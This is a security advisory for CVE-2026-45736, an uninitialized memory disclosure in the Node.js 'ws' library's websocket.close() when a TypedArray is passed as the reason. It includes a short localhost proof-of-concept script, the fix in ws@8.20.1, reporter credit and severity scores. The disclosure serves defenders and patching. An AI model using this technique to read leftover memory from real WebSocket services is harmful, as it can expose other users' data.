CVE-2026-45736
ADVISORY - githubSummary
Impact
The websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument.
Proof of concept
import { deepStrictEqual } from 'node:assert';
import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer(
{ port: 0, skipUTF8Validation: true },
function () {
const { port } = wss.address();
const ws = new WebSocket(`ws://localhost:${port}`, {
skipUTF8Validation: true
});
ws.on('close', function (code, reason) {
deepStrictEqual(reason, Buffer.alloc(80));
});
}
);
wss.on('connection', function (ws) {
ws.close(1000, new Float32Array(20));
});
Patches
The vulnerability was fixed in ws@8.20.1 (https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086).
Credits
Credit for the private and responsible disclosure of this issue goes to Nikita Skovoroda.
Remarks
Although the calculated CVSS severity is medium, the actual severity is believed to be low, as the flaw is only exploitable through misuse that is unlikely in practice.
Resources
Common Weakness Enumeration (CWE)
Use of Uninitialized Resource
Use of Uninitialized Resource
NIST
0.7
CVSS SCORE
4.4mediumGitHub
0.7
CVSS SCORE
4.4mediumDebian
-
Chainguard
CGA-342g-4fmm-4xmf
-
minimos
MINI-2f9f-x5g4-mfv2
-
minimos
MINI-55pp-xp9m-c89r
-
minimos
MINI-58gv-jxqg-749w
-
minimos
MINI-6882-8v6h-prp4
-
minimos
MINI-7vcp-376h-3889
-
minimos
MINI-8957-7vjf-5h2c
-
minimos
MINI-9544-4382-gpcf
-
minimos
MINI-jmw8-7qgg-xqw5
-
minimos
MINI-m3jf-9xfh-c35v
-
minimos
MINI-m4rq-q67j-j47r
-
minimos
MINI-v5jr-h4qc-mfjc
-